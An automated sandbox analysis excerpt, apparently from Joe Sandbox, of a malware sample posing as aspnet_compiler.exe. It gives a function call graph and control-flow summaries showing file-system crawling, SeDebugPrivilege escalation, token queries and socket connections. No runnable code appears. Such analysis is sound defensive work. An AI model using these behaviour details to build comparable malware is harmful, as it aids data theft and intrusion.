4067ad 8316->8317 8317->8303 8319 4031e5 4 API calls 8318->8319 8320 403bc9 GetFileAttributesW 8319->8320 8320->8308 8322 405797 4 API calls 8321->8322 8323 4058a8 8322->8323 8323->8265 8323->8267 8325 4031e5 4 API calls 8324->8325 8326 403baa 8325->8326 8326->8152 8326->8156 9763 40ebc6 9764 4040bb 12 API calls 9763->9764 9765 40ebdf 9764->9765 9766 40ecd7 9765->9766 9783 407795 9765->9783 9769 40eccd 9770 403f9e 5 API calls 9769->9770 9770->9766 9771 4056bf 2 API calls 9781 40ec12 9771->9781 9772 40ecb5 9773 402bab 2 API calls 9772->9773 9774 40ecbd 9773->9774 9775 413aca 4 API calls 9774->9775 9776 40ecc7 9775->9776 9777 405695 2 API calls 9776->9777 9777->9769 9778 407908 GetProcessHeap RtlAllocateHeap 9778->9781 9780 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9780->9781 9781->9772 9781->9778 9781->9780 9782 402bab GetProcessHeap HeapFree 9781->9782 9794 412269 9781->9794 9782->9781 9785 4077ab 9783->9785 9784 4077b3 9784->9769 9784->9771 9785->9784 9801 405ae9 9785->9801 9787 4077e1 9787->9784 9788 407802 9787->9788 9789 4077f8 9787->9789 9791 402b7c 2 API calls 9788->9791 9790 402bab 2 API calls 9789->9790 9790->9784 9793 407811 9791->9793 9792 402bab 2 API calls 9792->9784 9793->9792 9817 40374e 9794->9817 9799 402bab 2 API calls 9800 412299 9799->9800 9800->9781 9802 405af7 9801->9802 9803 402b7c 2 API calls 9802->9803 9805 405b03 9803->9805 9804 405b5a 9804->9787 9805->9804 9814 405998 9805->9814 9807 405b21 9808 405b61 9807->9808 9810 402b7c 2 API calls 9807->9810 9809 402bab 2 API calls 9808->9809 9809->9804 9811 405b39 9810->9811 9811->9808 9812 405b40 9811->9812 9813 402bab 2 API calls 9812->9813 9813->9804 9815 4031e5 4 API calls 9814->9815 9816 4059ab 9815->9816 9816->9807 9818 402b7c 2 API calls 9817->9818 9820 40375f 9818->9820 9819 4037a3 9819->9800 9824 4037be 9819->9824 9820->9819 9821 4031e5 4 API calls 9820->9821 9822 40378f 9821->9822 9822->9819 9823 402bab 2 API calls 9822->9823 9823->9819 9825 4031e5 4 API calls 9824->9825 9826 4037e2 9825->9826 9827 40382b 9826->9827 9828 402b7c 2 API calls 9826->9828 9827->9799 9829 403802 9828->9829 9830 403832 9829->9830 9832 403809 9829->9832 9831 4036a3 4 API calls 9830->9831 9831->9827 9833 4036a3 4 API calls 9832->9833 9833->9827 8924 410cd1 8929 412093 8924->8929 8927 412093 20 API calls 8928 410cff 8927->8928 8931 4120a5 8929->8931 8950 410cf1 8929->8950 8930 4120b3 8932 404056 6 API calls 8930->8932 8931->8930 8935 412100 8931->8935 8933 4120ba 8932->8933 8934 405b6f 6 API calls 8933->8934 8937 412152 8933->8937 8933->8950 8940 412125 8934->8940 8936 403fbf 7 API calls 8935->8936 8935->8950 8936->8933 8951 403d74 8937->8951 8940->8937 8942 412139 8940->8942 8943 41214d 8940->8943 8941 41218c 8945 402bab 2 API calls 8941->8945 8941->8950 8947 402bab 2 API calls 8942->8947 8946 402bab 2 API calls 8943->8946 8944 402bab 2 API calls 8944->8941 8945->8950 8946->8937 8948 41213e 8947->8948 8949 402bab 2 API calls 8948->8949 8949->8950 8950->8927 8952 403d87 8951->8952 8953 403ea3 8952->8953 8954 405b6f 6 API calls 8952->8954 8955 405b6f 6 API calls 8953->8955 8956 403da3 8954->8956 8957 403eb9 8955->8957 8956->8953 8959 4031e5 4 API calls 8956->8959 8958 4031e5 4 API calls 8957->8958 8965 403f6f 8957->8965 8960 403ed3 FindFirstFileW 8958->8960 8961 403dbc FindFirstFileW 8959->8961 8977 403ee8 8960->8977 8978 403f8d 8960->8978 8972 403e9c 8961->8972 8981 403dd1 8961->8981 8962 402bab 2 API calls 8962->8965 8963 402bab 2 API calls 8963->8953 8964 4031e5 4 API calls 8966 403e84 FindNextFileW 8964->8966 8965->8941 8965->8944 8967 403e96 8966->8967 8966->8981 8991 403bef 8967->8991 8968 4031e5 4 API calls 8971 403f50 FindNextFileW 8968->8971 8970 405b6f 6 API calls 8970->8977 8974 403f87 8971->8974 8971->8977 8972->8963 8973 405b6f 6 API calls 8973->8981 8975 403bef 5 API calls 8974->8975 8975->8978 8976 403f75 8979 402bab 2 API calls 8976->8979 8977->8968 8977->8970 8977->8976 8983 402bab 2 API calls 8977->8983 8994 40fa23 8977->8994 8978->8962 8982 403f7b 8979->8982 8980 403d74 15 API calls 8980->8981 8981->8964 8981->8973 8981->8980 8984 402bab 2 API calls 8981->8984 8986 403f63 8981->8986 8985 403bef 5 API calls 8982->8985 8983->8977 8984->8981 8985->8965 8987 402bab 2 API calls 8986->8987 8988 403f69 8987->8988 8989 403bef 5 API calls 8988->8989 8989->8965 8992 4031e5 4 API calls 8991->8992 8993 403c01 FindClose 8992->8993 8993->8972 8995 40fa39 8994->8995 8996 410293 8995->8996 8997 405b6f 6 API calls 8995->8997 8996->8977 8998 40ffcc 8997->8998 8998->8996 8999 4040bb 12 API calls 8998->8999 9000 40ffeb 8999->9000 9001 41028c 9000->9001 9003 402b7c 2 API calls 9000->9003 9049 41027d 9000->9049 9002 402bab 2 API calls 9001->9002 9002->8996 9005 41001e 9003->9005 9004 403f9e 5 API calls 9004->9001 9006 40a423 4 API calls 9005->9006 9005->9049 9007 41004a 9006->9007 9008 4031e5 4 API calls 9007->9008 9009 41005c 9008->9009 9010 4031e5 4 API calls 9009->9010 9011 410079 9010->9011 9012 4031e5 4 API calls 9011->9012 9013 410096 9012->9013 9014 4031e5 4 API calls 9013->9014 9015 4100b0 9014->9015 9016 4031e5 4 API calls 9015->9016 9017 4100cd 9016->9017 9018 4031e5 4 API calls 9017->9018 9019 4100ea 9018->9019 9050 412516 9019->9050 9021 4100fd 9022 40642c 5 API calls 9021->9022 9023 41013e 9022->9023 9024 410142 9023->9024 9025 41019f 9023->9025 9026 40488c 5 API calls 9024->9026 9028 4031e5 4 API calls 9025->9028 9027 410151 9026->9027 9029 404866 4 API calls 9027->9029 9046 41019c 9027->9046 9038 4101bb 9028->9038 9031 410163 9029->9031 9030 40642c 5 API calls 9033 410201 9030->9033 9039 406c4c 6 API calls 9031->9039 9047 41018e 9031->9047 9032 41022a 9034 413a58 13 API calls 9032->9034 9036 410205 9033->9036 9037 41022f 9033->9037 9041 41026e 9034->9041 9035 403c40 5 API calls 9035->9046 9042 4126a7 7 API calls 9036->9042 9053 4125db 9037->9053 9045 4031e5 4 API calls 9038->9045 9040 410178 9039->9040 9044 406c4c 6 API calls 9040->9044 9048 402bab 2 API calls 9041->9048 9042->9032 9044->9047 9045->9046 9046->9030 9046->9032 9047->9035 9048->9049 9049->9004 9051 4031e5 4 API calls 9050->9051 9052 412539 9051->9052 9052->9021 9054 40488c 5 API calls 9053->9054 9055 4125ec 9054->9055 9056 41269f 9055->9056 9057 4031e5 4 API calls 9055->9057 9056->9032 9058 412609 9057->9058 9059 41268f 9058->9059 9060 4031e5 4 API calls 9058->9060 9061 403c40 5 API calls 9059->9061 9062 41262a 9060->9062 9061->9056 9063 412675 9062->9063 9070 4124f1 9062->9070 9065 4031e5 4 API calls 9063->9065 9065->9059 9067 412663 9069 4031e5 4 API calls 9067->9069 9068 4124f1 4 API calls 9068->9067 9069->9063 9071 4031e5 4 API calls 9070->9071 9072 412503 9071->9072 9072->9067 9072->9068 9259 4049dc 9260 4031e5 4 API calls 9259->9260 9261 4049ef 9260->9261 9916 40cddd 9917 405b6f 6 API calls 9916->9917 9918 40cdee 9917->9918 9919 40ce06 9918->9919 9921 413a58 13 API calls 9918->9921 9920 40ce59 9919->9920 9923 405b6f 6 API calls 9919->9923 9922 40ce00 9921->9922 9924 402bab 2 API calls 9922->9924 9925 40ce1c 9923->9925 9924->9919 9925->9920 9926 40ce52 9925->9926 9928 403d74 19 API calls 9925->9928 9927 402bab 2 API calls 9926->9927 9927->9920 9929 40ce45 9928->9929 9929->9926 9930 402bab 2 API calls 9929->9930 9930->9926 9262 40ecde 9263 412093 20 API calls 9262->9263 9264 40ecfd 9263->9264 9265 412093 20 API calls 9264->9265 9266 40ed0d 9265->9266 9270 40e8df 9271 412093 20 API calls 9270->9271 9272 40e8f8 9271->9272 9273 412093 20 API calls 9272->9273 9274 40e908 9273->9274 9281 404b22 9274->9281 9276 40e91c 9277 40e936 9276->9277 9280 40e93d 9276->9280 9288 40e944 9276->9288 9279 402bab 2 API calls 9277->9279 9279->9280 9282 402b7c 2 API calls 9281->9282 9284 404b33 9282->9284 9283 404b66 9283->9276 9284->9283 9297 4049b3 9284->9297 9287 402bab 2 API calls 9287->9283 9289 4056bf 2 API calls 9288->9289 9290 40e952 9289->9290 9291 4057df 13 API calls 9290->9291 9296 40e976 9290->9296 9292 40e966 9291->9292 9293 413aca 4 API calls 9292->9293 9294 40e970 9293->9294 9295 405695 2 API calls 9294->9295 9295->9296 9296->9277 9298 4031e5 4 API calls 9297->9298 9299 4049c6 9298->9299 9299->9283 9299->9287 9300 4139de 9309 413855 9300->9309 9302 4139f1 9303 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9302->9303 9308 4139f7 9303->9308 9304 413866 58 API calls 9305 413a2d 9304->9305 9306 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9305->9306 9307 413a34 9306->9307 9308->9304 9310 4031e5 4 API calls 9309->9310 9311 413864 9310->9311 9311->9311 9936 4116e7 9937 4117ba 9936->9937 9938 405b6f 6 API calls 9937->9938 9943 4117f1 9937->9943 9939 4117d0 9938->9939 9940 404cbf 8 API calls 9939->9940 9939->9943 9941 4117eb 9940->9941 9942 402bab 2 API calls 9941->9942 9942->9943 9331 4094e7 9332 404b22 6 API calls 9331->9332 9333 4094fe 9332->9333 9334 409554 9333->9334 9335 405b6f 6 API calls 9333->9335 9336 409514 9335->9336 9337 404b22 6 API calls 9336->9337 9344 40954d 9336->9344 9339 40952d 9337->9339 9338 402bab 2 API calls 9338->9334 9340 409544 9339->9340 9341 409408 15 API calls 9339->9341 9342 402bab 2 API calls 9340->9342 9343 40953e 9341->9343 9342->9344 9345 402bab 2 API calls 9343->9345 9344->9338 9345->9340 9354 4058ea 9355 4031e5 4 API calls 9354->9355 9356 4058fd StrStrA 9355->9356 9988 40d4ea 9989 404bee 6 API calls 9988->9989 9991 40d500 9989->9991 9990 40d5a0 9991->9990 9992 404bee 6 API calls 9991->9992 9993 40d529 9992->9993 9994 404bee 6 API calls 9993->9994 9995 40d537 9994->9995 9996 404bee 6 API calls 9995->9996 9997 40d546 9996->9997 9997->9990 9998 405872 4 API calls 9997->9998 9999 40d56d 9998->9999 10000 405872 4 API calls 9999->10000 10001 40d57c 10000->10001 10002 405872 4 API calls 10001->10002 10003 40d58e 10002->10003 10004 405872 4 API calls 10003->10004 10004->9990 10005 40a3ea 10006 40374e 6 API calls 10005->10006 10007 40a403 10006->10007 10008 40a419 10007->10008 10009 4059d8 4 API calls 10007->10009 10010 40a411 10009->10010 10011 402bab 2 API calls 10010->10011 10011->10008 9394 404df3 WSAStartup 9398 4091f6 9399 404b22 6 API calls 9398->9399 9400 40920b 9399->9400 9401 409222 9400->9401 9402 409408 15 API calls 9400->9402 9403 40921c 9402->9403 9404 402bab 2 API calls 9403->9404 9404->9401 10038 4117fe 10039 404c4e 6 API calls 10038->10039 10040 411888 10039->10040 10041 404c4e 6 API calls 10040->10041 10046 411925 10040->10046 10042 4118ab 10041->10042 10042->10046 10057 4119b3 10042->10057 10044 4118c5 10045 4119b3 4 API calls 10044->10045 10047 4118d0 10045->10047 10047->10046 10048 4056bf 2 API calls 10047->10048 10049 4118fd 10048->10049 10050 405872 4 API calls 10049->10050 10051 41190a 10050->10051 10052 405872 4 API calls 10051->10052 10053 411915 10052->10053 10054 413aca 4 API calls 10053->10054 10055 41191f 10054->10055 10056 405695 2 API calls 10055->10056 10056->10046 10058 4119c6 10057->10058 10060 4119bf 10057->10060 10059 4031e5 4 API calls 10058->10059 10059->10060 10060->10044 9408 40e880 9409 41219c 14 API calls 9408->9409 9410 40e88e 9409->9410 9411 41219c 14 API calls 9410->9411 9412 40e89c 9411->9412 10124 40e48a 10125 404bee 6 API calls 10124->10125 10126 40e4d0 10125->10126 10127 405872 4 API calls 10126->10127 10128 40e4f4 10126->10128 10127->10128 9509 410390 9510 404b22 6 API calls 9509->9510 9511 4103a5 9510->9511 9512 410409 9511->9512 9513 405b6f 6 API calls 9511->9513 9518 4103ba 9513->9518 9514 410402 9515 402bab 2 API calls 9514->9515 9515->9512 9516 4103fb 9517 402bab 2 API calls 9516->9517 9517->9514 9518->9514 9518->9516 9519 403d74 19 API calls 9518->9519 9520 4103ee 9519->9520 9520->9516 9521 402bab 2 API calls 9520->9521 9521->9516 10139 40ed96 10140 4040bb 12 API calls 10139->10140 10154 40edb0 10140->10154 10141 40ef90 10142 40ef87 10143 403f9e 5 API calls 10142->10143 10143->10141 10144 405ae9 6 API calls 10144->10154 10145 412269 6 API calls 10145->10154 10146 40ef61 10147 40ef6e 10146->10147 10150 402bab 2 API calls 10146->10150 10151 40ef7c 10147->10151 10152 402bab 2 API calls 10147->10152 10148 402bab GetProcessHeap HeapFree 10148->10154 10149 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10149->10154 10150->10147 10151->10142 10153 402bab 2 API calls 10151->10153 10152->10151 10153->10142 10154->10141 10154->10142 10154->10144 10154->10145 10154->10146 10154->10148 10154->10149 10155 40ef98 10156 404c4e 6 API calls 10155->10156 10157 40efb6 10156->10157 10158 40f02a 10157->10158 10170 40f054 10157->10170 10161 404bee 6 API calls 10162 40efda 10161->10162 10163 404bee 6 API calls 10162->10163 10164 40efe9 10163->10164 10164->10158 10165 405872 4 API calls 10164->10165 10166 40f008 10165->10166 10167 405872 4 API calls 10166->10167 10168 40f01a 10167->10168 10169 405872 4 API calls 10168->10169 10169->10158 10171 40f064 10170->10171 10172 402b7c 2 API calls 10171->10172 10174 40f072 10172->10174 10173 40efca 10173->10161 10174->10173 10176 405ecd 10174->10176 10177 4059b8 4 API calls 10176->10177 10178 405edf 10177->10178 10178->10174 9528 410c98 9529 41219c 14 API calls 9528->9529 9530 410ca8 9529->9530 9531 41219c 14 API calls 9530->9531 9532 410cb5 9531->9532 9533 412093 20 API calls 9532->9533 9534 410cc9 9533->9534 10248 41249c 10249 4056bf 2 API calls 10248->10249 10250 4124aa 10249->10250 10251 4057df 13 API calls 10250->10251 10256 4124ce 10250->10256 10252 4124be 10251->10252 10253 413aca 4 API calls 10252->10253 10254 4124c8 10253->10254 10255 405695 2 API calls 10254->10255 10255->10256 9538 40f49e 9539 40f4b6 13 API calls 9538->9539 9540 40f4a8 9539->9540 9541 40929e 9542 413b28 6 API calls 9541->9542 9543 4092a4 9542->9543 9544 405b6f 6 API calls 9543->9544 9545 4092af 9544->9545 9546 4092c5 9545->9546 9547 409408 15 API calls 9545->9547 9548 4092bf 9547->9548 9549 402bab 2 API calls 9548->9549 9549->9546 10275 407fa4 10276 407fb7 10275->10276 10277 402b7c 2 API calls 10276->10277 10279 407fee 10276->10279 10278 40800d 10277->10278 10278->10279 10280 4037be 4 API calls 10278->10280 10281 40803c 10280->10281 10282 402bab 2 API calls 10281->10282 10282->10279 9586 4090aa 9587 404b22 6 API calls 9586->9587 9588 4090c1 9587->9588 9589 409408 15 API calls 9588->9589 9595 4090d8 9588->9595 9591 4090d2 9589->9591 9590 404b22 6 API calls 9592 4090eb 9590->9592 9593 402bab 2 API calls 9591->9593 9594 408c4d 15 API calls 9592->9594 9598 409104 9592->9598 9593->9595 9596 4090fe 9594->9596 9595->9590 9597 402bab 2 API calls 9596->9597 9597->9598 9605 409cae 9620 404b79 9605->9620 9607 409cc5 9608 409d27 9607->9608 9610 405b6f 6 API calls 9607->9610 9611 409d2f 9607->9611 9609 402bab 2 API calls 9608->9609 9609->9611 9612 409cec 9610->9612 9612->9608 9613 404b79 6 API calls 9612->9613 9614 409d05 9613->9614 9615 409d1e 9614->9615 9616 408c4d 15 API calls 9614->9616 9617 402bab 2 API calls 9615->9617 9618 409d18 9616->9618 9617->9608 9619 402bab 2 API calls 9618->9619 9619->9615 9621 404b22 6 API calls 9620->9621 9622 404b8a 9621->9622 9622->9607 10342 411fb3 10343 405b6f 6 API calls 10342->10343 10345 412013 10343->10345 10344 412075 10345->10344 10346 41206a 10345->10346 10361 411a8d 10345->10361 10348 402bab 2 API calls 10346->10348 10348->10344 10350 4056bf 2 API calls 10351 41203d 10350->10351 10352 405872 4 API calls 10351->10352 10353 41204a 10352->10353 10354 413aca 4 API calls 10353->10354 10355 412054 10354->10355 10356 405695 2 API calls 10355->10356 10357 41205a 10356->10357 10358 413a58 13 API calls 10357->10358 10359 412064 10358->10359 10360 402bab 2 API calls 10359->10360 10360->10346 10362 402b7c 2 API calls 10361->10362 10364 411aa3 10362->10364 10363 411f05 10363->10346 10363->10350 10364->10363 10384 404ada 10364->10384 10367 404ada 4 API calls 10368 411cad 10367->10368 10369 411f0c 10368->10369 10370 411cc0 10368->10370 10371 402bab 2 API calls 10369->10371 10387 405eb6 10370->10387 10371->10363 10373 411d3c 10374 4031e5 4 API calls 10373->10374 10380 411d7b 10374->10380 10375 411ea6 10376 4031e5 4 API calls 10375->10376 10377 411eb5 10376->10377 10378 4031e5 4 API calls 10377->10378 10379 411ed6 10378->10379 10381 405eb6 4 API calls 10379->10381 10380->10375 10382 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10380->10382 10383 405eb6 4 API calls 10380->10383 10381->10363 10382->10380 10383->10380 10385 4031e5 4 API calls 10384->10385 10386 404afd 10385->10386 10386->10367 10388 405998 4 API calls 10387->10388 10389 405ec8 10388->10389 10389->10373 9652 40f6b8 9653 41219c 14 API calls 9652->9653 9654 40f6c7 9653->9654 9655 41219c 14 API calls 9654->9655 9656 40f6d5 9655->9656 9657 41219c 14 API calls 9656->9657 9658 40f6df 9657->9658 9677 40d6bd 9678 4056bf 2 API calls 9677->9678 9679 40d6c9 9678->9679 9690 404cbf 9679->9690 9682 404cbf 8 API calls 9683 40d6f4 9682->9683 9684 404cbf 8 API calls 9683->9684 9685 40d702 9684->9685 9686 413aca 4 API calls 9685->9686 9687 40d711 9686->9687 9688 405695 2 API calls 9687->9688 9689 40d71f 9688->9689 9691 402b7c 2 API calls 9690->9691 9692 404ccd 9691->9692 9693 404ddc 9692->9693 9694 404b8f 5 API calls 9692->9694 9693->9682 9695 404ce4 9694->9695 9696 404dd4 9695->9696 9698 402b7c 2 API calls 9695->9698 9697 402bab 2 API calls 9696->9697 9697->9693 9707 404d04 9698->9707 9699 404dcc 9700 404a39 5 API calls 9699->9700 9700->9696 9701 404dc6 9702 402bab 2 API calls 9701->9702 9702->9699 9703 402b7c 2 API calls 9703->9707 9704 404b8f 5 API calls 9704->9707 9705 404a39 5 API calls 9705->9707 9706 405b6f 6 API calls 9706->9707 9707->9699 9707->9701 9707->9703 9707->9704 9707->9705 9707->9706 9708 404cbf 8 API calls 9707->9708 9709 402bab GetProcessHeap HeapFree 9707->9709 9708->9707 9709->9707 9710 40f0bf 9711 4056bf 2 API calls 9710->9711 9712 40f0c9 9711->9712 9713 40f115 9712->9713 9715 404cbf 8 API calls 9712->9715 9714 41219c 14 API calls 9713->9714 9716 40f128 9714->9716 9717 40f0ed 9715->9717 9718 404cbf 8 API calls 9717->9718 9719 40f0fb 9718->9719 9720 413aca 4 API calls 9719->9720 9721 40f10a 9720->9721 9722 405695 2 API calls 9721->9722 9722->9713

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 152 403ea6-403ea8 144->152 153 403daf-403dcb call 4031e5 FindFirstFileW 144->153 150 403f95 145->150 151 403ec6-403ee2 call 4031e5 FindFirstFileW 145->151 155 403f97-403f9d 150->155 159 403ee8-403ef8 call 405d24 151->159 160 403f8e-403f94 call 402bab 151->160 152->145 161 403dd1-403dd8 153->161 162 403e9d-403ea4 call 402bab 153->162 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->150 163 403e75-403e90 call 4031e5 FindNextFileW 161->163 164 403dde-403de2 161->164 162->152 163->161 180 403e96-403e97 call 403bef 163->180 168 403e12-403e22 call 405d24 164->168 169 403de4-403df9 call 405eff 164->169 189 403e30-403e4c call 405b6f 168->189 190 403e24-403e2e 168->190 169->163 186 403dfb-403e10 call 405eff 169->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->163 186->168 189->163 204 403e4e-403e6f call 403d74 call 402bab 189->204 190->163 190->189 193->162 205 403f8d 196->205 197->159 202 403f75-403f85 call 402bab call 403bef 199->202 203 403f35-403f36 call 40fa23 199->203 202->155 210 403f39-403f40 call 402bab 203->210 204->163 217 403f63-403f73 call 402bab call 403bef 204->217 205->160 210->181 217->155
                APIs
                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileFind$FirstNext
                • String ID: %s\%s$%s\*$Program Files$Windows
                • API String ID: 1690352074-2009209621
                • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                • String ID: SeDebugPrivilege
                • API String ID: 3615134276-2896544425
                • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                APIs
                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateProcess
                • String ID:
                • API String ID: 1357844191-0
                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                APIs
                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: recv
                • String ID:
                • API String ID: 1507349165-0
                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062e4 call 4031e5 265->273 266->257 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                APIs
                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                • _wmemset.LIBCMT ref: 00406244
                • _wmemset.LIBCMT ref: 00406261
                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _wmemset$ErrorInformationLastToken
                • String ID: IDA$IDA
                • API String ID: 487585393-2020647798
                • Opcode ID: 37bd598f585ee8cf67de5fee61dd0e5a81eae48bc97895d0ca2fa425d208ebcc
                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                • Opcode Fuzzy Hash: 37bd598f585ee8cf67de5fee61dd0e5a81eae48bc97895d0ca2fa425d208ebcc
                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 554 404ec7-404ec9 542->554 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->554 553 404ecd-404ece 548->553 553->539 554->553
                APIs
                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                • socket.WS2_32(?,?,?), ref: 00404E7A
                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: freeaddrinfogetaddrinfosocket
                • String ID:
                • API String ID: 2479546573-0
                • Opcode ID: 1ea65f7b2f5c66bc8d7842cb742c2a7fab5a9360e6dc5d4cf67b88a48fb7ceab
                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                • Opcode Fuzzy Hash: 1ea65f7b2f5c66bc8d7842cb742c2a7fab5a9360e6dc5d4cf67b88a48fb7ceab
                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                Control-flow Graph

                • Executed
                • Not Executed
